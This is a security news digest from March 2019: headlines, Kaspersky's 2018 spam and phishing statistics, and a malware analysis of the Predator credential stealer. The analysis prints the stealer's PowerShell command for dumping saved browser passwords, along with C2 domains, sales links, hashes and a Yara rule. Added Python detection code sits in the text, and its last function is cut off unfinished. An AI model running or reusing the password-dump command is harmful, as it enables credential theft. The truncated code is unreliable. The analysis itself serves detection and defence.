Viruses and Worms

Facebook sues developers over data-scraping quizzes

Sophos Naked Security - 12 March 2019 - 14:20
Downloaded by 63K users, the quizzes promised answers to questions such as "What kind of dog are you according to your zodiac sign?"

Study throws security shade on freelance and student programmers

Sophos Naked Security - 12 March 2019 - 13:23
A recent study shows that if you aren't prepared to ask or pay for security, you probably won't get it.

Citrix admits attackers breached its network – what we know

Sophos Naked Security - 12 March 2019 - 13:22
On Friday, software giant Citrix issued a short statement admitting that hackers recently managed to get inside its internal network. According to a statement by chief information security officer Stan Black, the company was told of the attack by the FBI on 6 March, since when it had established that attackers had taken “business documents” […]

Email list-cleaning site may have leaked up to 2 billion records

Sophos Naked Security - 12 March 2019 - 13:10
The number of records exposed online by Verification.io email list-cleaning service may be far higher than originally anticipated.

John Oliver bombards the FCC with anti-robocall robocall campaign

Sophos Naked Security - 12 March 2019 - 12:37
The Last Week Tonight host launched an anti-robocalling robocalling campaign to force the FCC to put a stop to the pervasive, irritating calls.

Spam and phishing in 2018

Kaspersky Securelist - 12 March 2019 - 11:00

Numbers of the year
  • The share of spam in mail traffic was 52.48%, which is 4.15 p.p. less than in 2017.
  • The biggest source of spam this year was China (11.69%).
  • 74.15% of spam emails were less than 2 KB in size.
  • Malicious spam was detected most commonly with the Win32.CVE-2017-11882 verdict.
  • The Anti-Phishing system was triggered 482,465,211 times.
  • 18.32% of unique users encountered phishing.
Global events and spam

GDPR

In the first months of the year alone, we registered a great many emails in spam traffic connected in some way to the EU General Data Protection Regulation (GDPR). It was generally B2B spam — mostly invitations to paid seminars, webinars, and workshops promising to explain the ins and outs of the new regulation and its ramifications for business.

During this period, there was an upturn in legitimate mailings too. Following the requirements of the regulation, companies sent out notifications on the transition to the GDPR policy requesting user consent to store and process personal data. Unsurprisingly, scammers tried to take advantage. Seeking to gain access to the personal data of clients of well-known companies, they sent out GDPR-related phishing emails prompting to update account information. Users who followed the link in the message and entered the required data immediately had it stolen by the fraudsters. It is worth noting that cybercriminals were interested largely in the data of clients of financial organizations and companies providing IT services.


Phishing emails exploiting the GDPR topic

2018 FIFA World Cup

The FIFA World Cup was one of the main media events of the year, reaching far beyond the world of sport. Scammers exploited the World Cup topic using a variety of classic deception methods based on social engineering. Cybercriminals created fake FIFA partner websites to gain access to victims’ bank accounts, carried out targeted attacks, and set up fake login pages for fifa.com accounts.


Examples of messages with World Cup ticket and trip giveaways

New iPhone launch

As is now customary, Apple’s unveiling of its latest device caused a spike in spam sent, supposedly, from Chinese companies offering accessories and replica gadgets. Such messages redirect the recipient to newly created, generic online stores, which willingly accept payments, but are not so great when it comes to dispatching goods.

The release coincided with a slight rise in the number of phishing messages exploiting the Apple brand (and its services), and emails with malicious attachments:

Malware and the corporate sector

In 2018, the number of malicious messages in spam was 1.2 times less than in 2017; Mail Anti-Virus was triggered a total of 120,310,656 times among Kaspersky Lab clients.

Number of Mail Anti-Virus triggerings among Kaspersky Lab clients in 2018

2018 saw a continuation of the trend for attention to detail in email presentation. Cybercriminals imitated actual business correspondence using the companies’ real details, including signatures and logos. To bypass security solutions (and convince users that files were safe), ISO, IQY, PIF, and PUB attachments were used, all non-typical formats for spam.

Credit organizations remain one of the most popular targets, and this trend is likely to continue in 2019. We also expect an increase in the number of attacks on the corporate sector as a whole.

New distribution channels

We have mentioned before that the distribution of phishing and other fraudulent content has gone beyond the scope of mailings. Scammers are not only testing new means of delivery, but getting victims themselves to distribute malicious content. Some of this year’s most massive attacks we registered in messengers and social networks.

“Self-propagating” phishing messages are similar to long-forgotten chain letters. They refer to non-existent giveaways or free lucrative offers, with one of the conditions for participation being to forward the message to friends or publish it on social media. At the start of the year, scammers used free air ticket lotteries as a bait, before switching to mailings supposedly from popular retail chains, restaurants, stores, and coffee bars. WhatsApp was the most common tool for distributing such messages.

Cryptocurrencies and spam

In 2018, far from waning, spammers’ interest in cryptocurrencies rose. Among the spam messages were fraudulent ones attempting to coerce potential victims into transferring money to cryptocurrency wallets.

One of the most popular kinds of fraud seen last year was “sextortion.” This type of ransom scam is based on the claim to be in possession of private information of an intimate nature. To avoid disclosure, the victim is told to transfer money to the cryptocurrency wallet specified in the message, which often looks very convincing and uses the victim’s actual personal data: name, passwords, phone numbers, etc. Against the backdrop of endless news reports about personal data leaks, such threats, backed up by real details, cause victims to panic and give in to the cybercriminals’ demands. Last year, the ransom sum ranged from a few hundred to several thousand dollars.

Initially, the mailings were aimed at an English-speaking audience, but at the end of Q3 we registered a wave of messages in other languages: German, Italian, Arabic, Japanese, French, Greek, and others.

Neither did the scammers forget about other fraud methods. Over the year, we identified fraudulent mailings supposedly from large charitable organizations asking to help children by purchasing some data etc. All these schemes had a common thread: The money transfer was requested in cryptocurrency. It should be noted that such messages were very few compared with the mailings described above.

In 2019, spammers will continue to exploit the cryptocurrency topic. We expect to see more fraudulent mailings aimed at both extracting cryptocurrency and gaining access to personal accounts with various cryptocurrency services.

Phishing

Cryptocurrency

Cryptocurrency remains one of the most common phishing topics. In 2018, our Anti-Phishing system prevented 410,786 attempts to redirect users to phishing sites imitating popular cryptocurrency wallets, exchanges, and platforms. Fraudsters are actively creating fake login pages for cryptocurrency services in the hope of getting user credentials.

Another hot topic last year was fake ICOs. Scammers invited victims to invest in various initial coin offerings not only by email, but through social media posts as well. There was something for everyone: One of the scams, for example, targeted buzcoin, a cryptocurrency named after Russian singer Olga Buzova. The cybercrooks managed to get hold of the project mailing list and send fake presale invitations to subscribers the day before the start of the ICO. Before the bona fide organizers had time to sneeze, the attackers had scooped around $15,000.

But it was the blockchain project of Pavel Durov, TON, which had the dubious honor of most fakes back in early 2018. The cryptocurrency boom and rumors in late 2017 about an ICO from the creator of Telegram provided fertile ground. Many people believed the scammers and, despite warnings from Pavel himself on social media, transferred money to them.

Lotteries and surveys

Another way to nudge victims into transferring money is via the promise of a guaranteed lottery win or a reward for taking part in a poll. In 2018, our security solutions blocked 3,200,180 attempted redirects to fraudulent websites offering lotteries or surveys.

To take part in the draw, users are asked to make a contribution: the more you give, the more you (supposedly) get. Survey scams work in a similar way. The victim is asked to transfer a sum of money to pay for “administrative costs,” after which the reward will be transferred, or so it is promised.

Universities

Phishers hunt not only for money, but also for knowledge: Over the past year, we registered phishing attacks against 131 universities in 16 countries. More than half (83) were in the US, followed by Britain (21), and Australia and Canada (7 each). One high-profile incident was the theft of millions of documents (including nuclear energy research) from several British universities.

Taxes

In Q1 (the last quarter of the financial year in many countries), we observed a large number of phishing pages imitating the websites of HMRC (UK), the IRS (US), and other countries’ tax authorities. Cybercriminals tried to finagle personal data, answers to security questions, bank account information, and other data from users. Some fake tax service sites distributed malware.


Fake tax service websites

HTTPS

As we wrote a year earlier, the number of phishing pages on domains with SSL certificates has increased. Ironically, this was facilitated by the widespread adoption of HTTPS, since pages with a certificate (and padlock) are trusted far more. But getting hold of a certificate is not hard, especially for competent cybercriminals. The problem has taken on such dimensions that since September 2018 with the latest version of Chrome, the browser has stopped highlighting HTTPS sites with a green padlock in the address bar and marking them as “Secure.” Instead, the “Not secure” label is now assigned to sites without HTTPS.

Sales

Every year, November sees the start of the sales season. First up is World Shopping Day, followed by Black Friday. Cybercriminals prepare for such events in advance and commence their mass attacks long before the sales start. According to our statistics, the number of attempts to redirect users to fraudulent websites exploiting the sales topic starts to rise at the end of October.

Fraudsters use standard methods to extract personal data and money from victims, including fake websites mimicking popular online stores with huge discounts on expensive goods.

Statistics: spam

Proportion of spam in email traffic

The share of spam in email traffic in 2018 decreased by 4.15 p.p. to 52.48%.

Proportion of spam in global email traffic, 2018

The lowest share (47.70%) was recorded in April 2018. The highest (57.26%) belonged to December.

Sources of spam by country

In 2018, China (11.69%) led the list of spamming countries, swapping places with the US and consigning the former leader to second place with 9.04%. Third position went to Germany (7.17%), which climbed into the Top 3 from sixth.

Vietnam, which ranked third last year, fell to fourth place (6.09%). It was followed by Brazil (4.87%), India (4.77%), and Russia (4.29%).

In 8th place, as in 2017, came France (3.34%), while Iran and Italy departed the Top 10. They were replaced by newcomers Spain, which rose from 16th to 9th place (2.20%, +0.72 p.p.), and Britain (2.18%, +0.59 p.p.).

Sources of spam by country, 2018

Spam email size

In 2018, the share of very small (up to 2 KB) messages increased significantly. Despite quarterly decline, the annual figure came in at 74.15%, up 30.75 p.p. against the previous reporting period. The proportion of 2–5 KB messages also increased (10.64%, +5.56 p.p.).

Spam emails by size, 2018

The volume of larger spam dropped significantly against 2017. The share of messages sized 5–10 KB (7.37%) decreased by 1.77 p.p. and 10–20 KB (3.66%) by 12.6 p.p. The share of spam messages sized 20–50 KB (2.82%) saw the biggest drop, down 18.41 p.p.

Malicious attachments in email

Malware families

Top 10 malware families in 2018

In 2018, the most widely distributed malicious objects in email, assigned the Exploit.Win32.CVE-2017-11882 verdict, exploited a Microsoft Office vulnerability for executing arbitrary code without the user’s knowledge.

In second place was the Backdoor.Win32.Androm bot, whose functionality depends on additional modules downloaded at the command of the C&C servers. It was most often used to download malware.

The Trojan-PSW.Win32.Fareit family moved up from fifth to third place. Its main task is to steal data (cookies, passwords for various FTP, mail, and other services). The harvested information is sent to the cybercriminals’ server. Some members of the family are able to download and run other malware.

The Worm.Win32.WBVB family, which includes executable files written in Visual Basic 6 (in both P-code and Native mode) that are not trusted in KSN, remained in fourth place.

Fifth place went to the Backdoor.Java.Qrat family — cross-platform multi-functional backdoor written in Java and sold in the Darknet as a Malware-as-a-Service (MaaS) package. It is generally distributed by email in JAR attachments.

Trojan-Downloader.MSOffice.SLoad, a DOC/DOCX document containing a script that can be executed in MS Word, took sixth place. It is generally used to download and install ransomware on user computers.

The spyware Trojan-Spy.Win32.Noon ranked seventh.

The malware Trojan.PDF.Badur, which consists of a PDF document containing a link to a potentially dangerous website, dropped one place to eighth.

Ninth place was taken by the Trojan.BAT.Obfus family of malicious objects — obfuscated BAT files for running malware and changing OS security settings.

In tenth place, as in the previous year, was the family of Trojan downloaders Trojan.Win32.VBKrypt.

Countries targeted by malicious mailshots

As in previous years, first place in 2018 went to Germany. Its share accounted for 11.51% of all attacks. Second place was taken by Russia (7.21%), and Britain (5.76%) picked up bronze.

Countries targeted by malicious mailshots, 2018

The next three, separated by a whisker, were Italy (5.23%), Brazil (5.10%), and Vietnam (5.09%). Trailing Vietnam by 1.35 p.p. in seventh was the UAE (3.74%). India (3.15%), Spain (2.51%), and Taiwan (2.44%) rounded off the Top 10.

Statistics: phishing

In 2018, the Anti-Phishing system was triggered 482,465,211 times on Kaspersky Lab user computers as a result of phishing redirection attempts (236,233,566 more than in 2017). In total, 18.32% of our users were attacked.

Organizations under attack

The rating of organizations targeted by phishing attacks is based on the triggering of the heuristic component in the Anti-Phishing system on user computers. This component detects all instances when the user tries to follow a link in an email or on the Internet to a phishing page in the event that such links have yet to be added to Kaspersky Lab’s databases.

Rating of categories of organizations attacked by phishers

In 2018, global Internet portals accounted for the lion’s share of heuristic component triggers. Their share increased by 11.23 p.p. to 24.72% against the previous year. In second place came the banking sector (21.70%), down 5.3 p.p. Payment systems (14.02%) ranked third in 2018.

Distribution of organizations subject to phishing attacks by category, 2018

Top 3 organizations under attack from phishers

This rating is made of organizations whose names were most frequently used by phishers (according to the heuristic statistics for triggers on user computers). It was the same lineup as in 2017, but rearranged slightly, with Microsoft in first place.

  • Microsoft: 6.86%
  • Facebook: 6.37%
  • PayPal: 3.23%

Attack geography

Countries by share of attacked users

Brazil (28.28%) remains out in front by percentage of attacked unique users out of the total number of users in the country.

Percentage of users on whose computers the Anti-Phishing system was triggered out of all Kaspersky Lab users in the country, 2018

Top 10 countries by share of attacked users (country: % of users attacked)
  • Brazil: 28.28
  • Portugal: 22.63
  • Australia: 20.72
  • Algeria: 20.46
  • Réunion: 20.39
  • Guatemala: 20.34
  • Chile: 20.09
  • Spain: 20.05
  • Venezuela: 19.89
  • Russia: 19.76

Despite a slight drop of 0.74 p.p., Brazil (28.28%) remains top by number of attacked users. Meanwhile, Portugal (22.63%) moved up to second place (+5.87 p.p.), displacing Australia (20.72%, –1.79 p.p.).

Conclusion

2018 showed that cybercriminals continue to keep a close eye on global events and use them to achieve their goals. We have seen a steady increase in phishing attacks on cryptocurrency-related resources, and expect new scams to appear in 2019. Despite the fall in value and the lean times for the cryptocurrency market as a whole, phishers and spammers will try to squeeze everything they can out of this topic.

The past year also demonstrated that spammers and scammers will continue to exploit annually occurring events — new smartphone launches, sales seasons, tax deadlines/rebates, and the like.

There is also a trend toward the transition to new channels of content distribution: Cybercriminals in 2018 used new methods of communication with their “audience,” including instant messengers and social networks, releasing wave after wave of self-propagating malicious messages. Hand in hand with this, as illustrated by the attack on universities, fraudsters are seeking not only new channels, but new targets as well.

The Handmaid's Tale or Man-made Fail? Exposed DB of 'BreedReady' women probably not as bad as it sounds

The Register - Anti-Virus - 11 March 2019 - 20:43
Dystopian forced pregnancy scenarios likely a figment of Western media biases

An unprotected MongoDB database of 1.8 million women in China has been taken offline after drawing media attention for the inclusion of a data field designating whether the women are "BreedReady."…

Category: Viruses and Worms

Researcher Claims Iranian APT Behind 6TB Data Heist at Citrix

VirusList.com - 11 March 2019 - 20:31
IRIDIUM is an APT that uses proprietary techniques to bypass two-factor authentication for critical applications, according to security firm Resecurity.
Category: Viruses and Worms

Google Patches Critical Bluetooth RCE Bug

VirusList.com - 11 March 2019 - 20:14
In all, Google reported 45 bugs in its March update with 11 ranked critical and 33 rated high.
Category: Viruses and Worms

Forrester: Ransomware Set to Resurge As Firms Pay Off Attacks

VirusList.com - 11 March 2019 - 18:44
In this video, Josh Zelonis, senior analyst at Forrester Research, discusses the next great security threats to enterprises.
Category: Viruses and Worms

NASA's crap infosec could be 'significant threat' to space ops

The Register - Anti-Virus - 11 March 2019 - 17:23
Inspectors not happy with stagnant security practices

NASA's Office of the Inspector General has once again concluded the American space agency's tech security practices are "not consistently implemented".…

Category: Viruses and Worms

Hapless engineers leave UK cable landing station gate open, couple of journos waltz right in

The Register - Anti-Virus - 11 March 2019 - 16:40
Infosec skills are useful. But so are locked doors

Journalists were able to bimble into a UK cable landing station almost completely unchallenged after security gates were left open and unlocked.…

Category: Viruses and Worms

Facebook Alleges Two Ukrainians Scraped Data From 63K Profiles

VirusList.com - 11 March 2019 - 15:51
Facebook is suing two Ukrainian men who were able to scrape data from 63,000 users' profiles by enticing users to download a malicious browser extension.
Category: Viruses and Worms

Just a reminder: We're still bad at securing industrial controllers

The Register - Anti-Virus - 11 March 2019 - 14:30
Moxa boxes caught using plain text passwords and insecure web apps

Bug hunters have discovered yet another set of flaws in industrial control systems used by electric utilities, oil and gas companies, and shipping and transportation providers.…

Category: Viruses and Worms

US Army clarifies its killer robot plans

Sophos Naked Security - 11 March 2019 - 13:27
The US Army has been forced to clarify its intentions for killer robots after unveiling a new program to build AI-powered targeting systems last month.

Booking a restaurant? Let Google’s Duplex AI make the call for you

Sophos Naked Security - 11 March 2019 - 12:06
Bon appétit, Dave. Google's table-booking Duplex AI needs to pass the creepy test.

FTC says taxpayer voice phishing scams are up nearly 20x

Sophos Naked Security - 11 March 2019 - 11:50
The real Social Security people will never call to threaten your benefits or tell you to wire money, send cash, or put money on gift cards.

Monday review – the hot 25 stories of the week

Sophos Naked Security - 11 March 2019 - 11:29
From a serious Chrome zero-day to Comcast's security nightmare, and everything in between - it's weekly roundup time.

A predatory tale: Who’s afraid of the thief?

Kaspersky Securelist - 11 March 2019 - 11:00

In mid-February, Kaspersky Lab received a request for incident response from one of its clients. The individual who initially reported the issue to our client refused to disclose the origin of the indicator that they shared. What we do know is that it was a screenshot from one of the client’s internal computers taken on February 11 while an employee was apparently browsing through his emails. In addition, the anonymous source added that the screenshot was transferred to a C2 using a stealer dubbed ‘Predator’.

As soon as the client contacted us, we started conducting a full investigation into the infected machine, including memory dumps, event logs, environment indicators from the network and so on and so forth. Finding very little information about this tool, we decided that seeing as how we’d already dived into the stealer, we might as well share some of our main findings in case other incidents occur in the future. The purpose of this blogpost is to enumerate the Predator stealer’s versions, technical features, indicators and Yara rule signatures, to help monitor and detect new samples, and to provide general information about its owners’ activities.

As well as all the information we collected from the client, we went the extra mile and contacted a source who had previously analyzed Predator. This source was @Fumik0_, a French malware researcher who analyzed versions 2.3.5 and 2.3.7 in his blog just a few months ago (October 2018).

He joined Ido Naor, a principal security researcher at Kaspersky Lab and together they compiled a full analysis of the new versions of ‘Predator the thief’.

The blog was apparently so influential that the owners of the stealer decided to contact Fumik0 via Twitter. An account named Alexuiop1337 claiming to be the owner of Predator is also active and has been responding to Fumik0’s discoveries until fairly recently.

Predator the thief

Predator is a data stealer developed by Russian-speaking individuals. It’s being sold cheaply on Russian forums and has been detected many times in the wild. Although detection is successful with previous versions, its owners are rapidly adapting by generating FUD (Fully UnDetectable) samples every few days. The owners are not responsible for the victim attack vector and are only selling the builder. For a small additional payment they can also generate an administration panel for customers. The newest samples were exposed on their Telegram group; however, the links only redirect to a little-known AV aggregator which we don’t have access to. We’re currently tracking the samples’ hashes and waiting for triggers to show up.

  • Latest version: v3.0.7
  • Sample MD5: bf4cd781920f2bbe57e7e74a775b8e94
  • Code language: C++
  • File types: PE
  • Supported arch.: x86 and x64
  • Unpacked size: <500 KB
  • Admin panel example: https://predatortop.xyz/login
  • Admin panel software: PHP, Apache, Ubuntu

From v2 to v3

Predator, as a stealer, is considered simple and cheap. It’s good for attacking individuals and small businesses, but as far as large companies go, protection solutions and response teams can detect and remove its activity in a relatively short amount of time.

That said, the owners of Predator are very business oriented. They’re constantly updating their software, attempting to extend features and adjusting to client requirements and are generally not that aggressive when it comes to disclosure/analysis of their tool.

Obfuscation

Predator’s owners decided to obfuscate most of its code with a number of simple techniques. XOR, Base64, Substitutions, Stack strings and more are being used to hide API methods, Folder paths, Register keys, the C2 server/Admin panel and so on.

We sketched a flow chart for one of the obfuscation techniques. A large chunk of code boiled down to one Windows API call, which we see as a bit like overkill considering the fact that other techniques can be applied to strip the obfuscation.

We’ve written down a list for those who are after a step-by-step guide:

  • Step 0: Saving arguments somewhere
  • Step 1: Get the function name
  • Step 2: Get the library name
  • Step 3: Recreating GetProcAddress
  • Step 4: Calling the function by a simple register call

Export table

It was also found that the export table trick for getting the API function is far more complex than the one introduced in v2:

Anti-debugging/sandbox checks

Predator retains its old techniques for sandbox evasion, but keeps adding more and more features. One of them, for example, is a hardcoded list of DLLs that are checked if loaded into memory:

  • sbiedll
  • dbghelp
  • api_log
  • pstorec
  • dir_watch
  • vmcheck
  • wpespy
  • SxIn
  • Sf2

Loop for checking list of DLLs

One old trick, for example, that survived the version update is the check of Graphic Card Name introduced in v2.x.x.

Classy but mandatory – browser stealer support

Edge and Internet Explorer support was recently added to the list of browsers. The actions taken, however, differ from the malware’s handling of the Gecko and Chromium browsers. In previous versions, Predator used a temporary file (*.col format) to store browser content (an SQLite3 database), but for Edge and IE this was replaced with a hardcoded PowerShell command that writes the content directly into a dedicated repository.

powershell.exe -Command "[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault; $b = 'Browser: Internet Explorer | Edge'; $a = ($vault.RetrieveAll() | % { $_.RetrievePassword(); $_ } | SELECT UserName, Password, Resource | Format-List Resource, UserName, Password) | Out-String; $c = $b + $a; $c = $c.Replace('Resource :', 'Url:').Replace('UserName :', 'Login:').Replace('Password :', 'Password:'); $c > "%PREDATOR_PATH%\General\IeEdgePasswords.txt"
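Two defender-side checks built from the indicators in this section, as an added example that is not part of the Securelist analysis: the first looks for the hardcoded sandbox-DLL list (and the artifact file names the report mentions) inside a file image, in both ASCII and UTF-16LE encodings; the second flags a process command line that loads the Windows PasswordVault class and enumerates or reveals its entries, which is how the IE/Edge one-liner above would show up in process-creation or script-block logging. The sample bytes and command lines are constructed for the demonstration, and the threshold of four DLL names is my own choice rather than anything the report states.

```python
# Added example: detection helpers for the Predator indicators described above.
# Not Kaspersky's code; sample inputs below are constructed for the demonstration.
import re
from dataclasses import dataclass

# DLL names the report says Predator checks for in memory (sandbox/analysis tooling)
PREDATOR_SANDBOX_DLLS = (
    "sbiedll", "dbghelp", "api_log", "pstorec", "dir_watch",
    "vmcheck", "wpespy", "SxIn", "Sf2",
)

# Artifact file names the report attributes to the stealer
PREDATOR_ARTIFACT_NAMES = ("information.log", "IeEdgePasswords.txt")


def _encodings(name: str):
    """A string may be stored as ASCII or as UTF-16LE (common in Windows binaries)."""
    return (name.encode("ascii").lower(), name.encode("utf-16-le").lower())


@dataclass
class SampleVerdict:
    sandbox_dlls: list
    artifacts: list
    min_dll_hits: int

    @property
    def suspicious(self) -> bool:
        # Names such as "Sf2" are too short to mean much alone: require most of the
        # evasion list to be present, or one of the known artifact file names.
        return len(self.sandbox_dlls) >= self.min_dll_hits or bool(self.artifacts)


def scan_sample_bytes(data: bytes, min_dll_hits: int = 4) -> SampleVerdict:
    """Look for Predator's hardcoded sandbox-DLL list and artifact names in a file image."""
    haystack = data.lower()
    dll_hits = [n for n in PREDATOR_SANDBOX_DLLS if any(e in haystack for e in _encodings(n))]
    artifact_hits = [n for n in PREDATOR_ARTIFACT_NAMES if any(e in haystack for e in _encodings(n))]
    return SampleVerdict(dll_hits, artifact_hits, min_dll_hits)


# The IE/Edge credential collection is a plain PowerShell one-liner, so a
# process-creation (4688 / Sysmon 1) or script-block (4104) log entry is where to catch it.
_VAULT_CLASS = re.compile(r"Windows\.Security\.Credentials\.PasswordVault", re.I)
_VAULT_DUMP = re.compile(r"RetrieveAll\s*\(\s*\)|RetrievePassword\s*\(\s*\)", re.I)


def is_vault_dump_commandline(cmdline: str) -> bool:
    """True when a command line loads PasswordVault and enumerates/reveals its entries."""
    return bool(_VAULT_CLASS.search(cmdline) and _VAULT_DUMP.search(cmdline))


# --- constructed inputs for a stand-alone run (hypothetical, not real samples/logs) ---
# A fake "binary": header-like bytes with the evasion list embedded as UTF-16LE strings,
# the way a string table in a compiled Windows executable might hold them.
CONSTRUCTED_SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 32
    + b"".join(n.encode("utf-16-le") + b"\x00\x00"
               for n in ("SbieDll", "dbghelp", "api_log", "pstorec", "dir_watch", "vmcheck"))
    + b"information.log\x00"
)
CONSTRUCTED_BENIGN = b"MZ\x90\x00" + b"\x00" * 32 + b"kernel32.dll\x00user32.dll\x00"

CONSTRUCTED_CMDLINES = [
    'powershell.exe -Command "[void][Windows.Security.Credentials.PasswordVault,'
    'Windows.Security.Credentials,ContentType=WindowsRuntime];'
    '$vault = New-Object Windows.Security.Credentials.PasswordVault; '
    '$a = ($vault.RetrieveAll() | % { $_.RetrievePassword(); $_ }) | Out-String"',
    'powershell.exe -Command "Get-Process | Out-String"',
]

if __name__ == "__main__":
    v = scan_sample_bytes(CONSTRUCTED_SAMPLE)
    print("sample:", v.sandbox_dlls, v.artifacts, "suspicious" if v.suspicious else "clean")
    print("benign suspicious:", scan_sample_bytes(CONSTRUCTED_BENIGN).suspicious)
    for c in CONSTRUCTED_CMDLINES:
        print(is_vault_dump_commandline(c), c[:60])
```

The byte scan is deliberately encoding-agnostic because a string that is visible in ASCII in one build may be stored as wide characters in the next; the threshold keeps the two- or three-character names from triggering on their own. The command-line check keys on the combination of the class name and the enumeration calls rather than on the exact quoted text, so minor rewrites of the one-liner (renamed variables, different output path) still match.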

As a reminder, Predator currently supports the following list of browser data theft, according to the info on the ‘official’ sales page:

The false keylogger feature

The owners of Predator list keylogger capabilities among its features, but a closer inspection of the code reveals that no keylogging is carried out. The behavior we captured is clearly that of a clipboard stealer: a routine that checks whether the clipboard contains data, grabs it and places it in a dedicated file the stealer's owners have named ‘information.log’.

Thief logs

Diving into the file discussed in the clipboard stealer section above, we saw drastic changes from previous versions. The information logger is perhaps the most important collector of Predator. It stores all the tasks performed by the stealer on the victim machine.

We noticed that in previous minor versions, logs started collecting data that might be of interest to potential customers, such as:

  • HWID
  • System Language
  • Keyboard Layout

At the end of the report, the owners added a customer/payload ID – probably to improve support.

Updates

Predator is continually integrating new software into the stealing list and fixing bugs to maintain its stability and its popularity. Here’s a summary of the new features in v3:

Location | Data stolen
Games | Osu, Battle.net
FTP | WinSCP
VPN | NordVPN
2FA | Authy
Messengers | Pidgin, Skype
Operating System | Webcam, HWID, Clipboard, Specific document files (Grabber), Project filenames*
Browsers | IE/Edge

*We noticed that the newest version of Predator has started collecting a list of .sln file names. These are project files usually generated by Visual Studio. We still have no idea if this is related to client demand for a future feature.

Sale point (Russian forums)

We found a very active seller of Predator on a forum called VLMI. It appears the main language on VLMI is Russian and the content mainly revolves around cyberattacks. In addition, the forum has a very strict set of rules that might get you banned if broken. The two sections (translated using Google) in the image below are examples of forbidden behavior.

It also appears that each offer on the forum must go through a reviewer who decides whether the piece of software or service is of financial benefit to the forum administrators, but at the same time fair towards other members.

For 8,000 rubles (~$120) worth of software, the forum will charge a 20% fee; if the value goes above 100,000 rubles (~$1,500), the commission decreases to 10%.

The Predator stealer’s main sales thread was found here:

https://vlmi.biz/threads/predator-the-thief-nativnyj-stiller-s-bolshim-funkcionalom-luchshaja-cena.21069/

Predator costs 2,000 rubles (~$30) for the stealer and admin panel. There is also an optional service to help the customer install the C&C. This is not as expensive as other stealers on the market, such as Vidar and HawkEye, but its developers are proactive in delivering updates and ensuring a fast and effective support service.

Telegram as a service

Predator’s main channel for updating their customers is Telegram. At the time of writing, the administrators were hosting over 370 members in this group:

https://t.me/PredatorSoftwareChannel

Another update channel is the seller @sett9.

It appears the Predator administrators are demonstrating FUD (fully undetectable) capabilities by running a sample generated by the builder of their stealer. However, some samples from their latest update (v3.0.7) have already been detected by Kaspersky products as Trojan-PSW.Win32.Predator.qy (25F9EC882EAC441D4852F92E0EAB8595), while others are detected by heuristics.

https://scanmybin.net/result/af76a5666e5230cf087c270c51c2dfdc4324c365dc6f93c0f3ae7ce24f9db992

https://run4me.net/result/80163ed2bede58aff68a3bdf802917c61c78a05f37a3caf678ce5491f00d39b0

The executables above were not found in VirusTotal. According to the group, the links were posted around August of last year (2018). Numerous media uploads on the Telegram group revealed dozens of infected victims.

On the day we looked at the Telegram group (February 17, 2019), the latest build (v3.0.7) was released. According to the owners’ release notes, it was implemented with WinSCP and NordVPN support.

IOCs

IP/Domains:

Predator version | IP/Domain
v3.0.3 | 15charliescene15[.]myjino[.]ru
v3.0.4 | axixaxaxu1337[.]us
v3.0.5 | madoko[.]jhfree[.]net
v3.0.6 | kristihack46[.]myjino[.]ru
v3.0.7 | j946104[.]myjino[.]ru

Hashes:

Predator version | MD5 Hash
v3.0.3 | c44920c419a21e07d753ed607fb6d7ca
v3.0.4 | cf2273b943edd0752a09e90f45958c85
v3.0.5 | b2cbb3d80c8d830a3b3c2bd568ba1826
v3.0.6 | dff67a78bb4866f9da5a0c1781ed5348
v3.0.7 | 25F9EC882EAC441D4852F92E0EAB8595

Yara:

rule Predator_The_Thief : Predator_The_Thief
{
    meta:
        description = "Yara rule for Predator The Thief 3.0.0+"
        author = "Fumik0_"
        date = "2018/10/12"
        update = "2019/02/26"
    strings:
        $mz = { 4D 5A }

        /* Predator V3.0.0+ */
        $x1 = { C6 84 24 ?? ?? 00 00 8C }
        $x2 = { C6 84 24 ?? ?? 00 00 1A }
        $x3 = { C6 84 24 ?? ?? 00 00 D4 }
        $x4 = { C6 84 24 ?? ?? 00 00 03 }
        $x5 = { C6 84 24 ?? ?? 00 00 B4 }
        $x6 = { C6 84 24 ?? ?? 00 00 80 }

        /* Predator V3.0.3 -> 3.0.6 */
        $y1 = { B8 00 E1 F5 05 }
        $y2 = { 89 5C 24 0C }
        $y3 = { FF 44 24 ?? }
        $y4 = { 39 44 24 0C }
        $y5 = { BF 00 00 A0 00 }
    condition:
        $mz at 0 and ( (all of ($x*)) or (all of ($y*)) )
}
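To see what the Yara rule above actually keys on, the script below (an added example, not code from the article, from Kaspersky or from the rule's author) implements its wildcard hex patterns and its condition in plain Python and runs them over constructed buffers, not real Predator samples. The $x bytes are the x86 encoding of `mov byte ptr [esp+disp32], imm8` with a small displacement, i.e. a string being assembled on the stack one byte at a time, which is why the rule keeps the displacement bytes as wildcards and pins only the stored byte; the $y bytes decode to a counter loop compared against 100,000,000.

```python
from __future__ import annotations

# Hex strings copied from the Predator_The_Thief Yara rule above.
MZ_PATTERN = "4D 5A"
X_PATTERNS = [                      # C6 84 24 <disp32> <imm8>:
    "C6 84 24 ?? ?? 00 00 8C",      #   mov byte ptr [esp+disp32], imm8
    "C6 84 24 ?? ?? 00 00 1A",
    "C6 84 24 ?? ?? 00 00 D4",
    "C6 84 24 ?? ?? 00 00 03",
    "C6 84 24 ?? ?? 00 00 B4",
    "C6 84 24 ?? ?? 00 00 80",
]
Y_PATTERNS = [
    "B8 00 E1 F5 05",   # mov eax, 0x05F5E100 (100,000,000)
    "89 5C 24 0C",      # mov [esp+0Ch], ebx
    "FF 44 24 ??",      # inc dword ptr [esp+disp8]
    "39 44 24 0C",      # cmp [esp+0Ch], eax
    "BF 00 00 A0 00",   # mov edi, 0x00A00000
]


def parse_hex_pattern(pattern: str) -> list[int | None]:
    """'C6 84 24 ?? ?? 00 00 8C' -> [0xC6, 0x84, 0x24, None, None, 0, 0, 0x8C]."""
    return [None if tok == "??" else int(tok, 16) for tok in pattern.split()]


def match_at(data: bytes, pat: list[int | None], off: int) -> bool:
    """True if the wildcard pattern matches data at exactly offset off."""
    if off < 0 or off + len(pat) > len(data):
        return False
    return all(p is None or data[off + i] == p for i, p in enumerate(pat))


def find_pattern(data: bytes, pat: list[int | None]) -> int:
    """Offset of the first match anywhere in data, or -1."""
    for off in range(len(data) - len(pat) + 1):
        if match_at(data, pat, off):
            return off
    return -1


def matches_predator_rule(data: bytes) -> bool:
    """Mirror of the condition: $mz at 0 and (all of ($x*) or all of ($y*))."""
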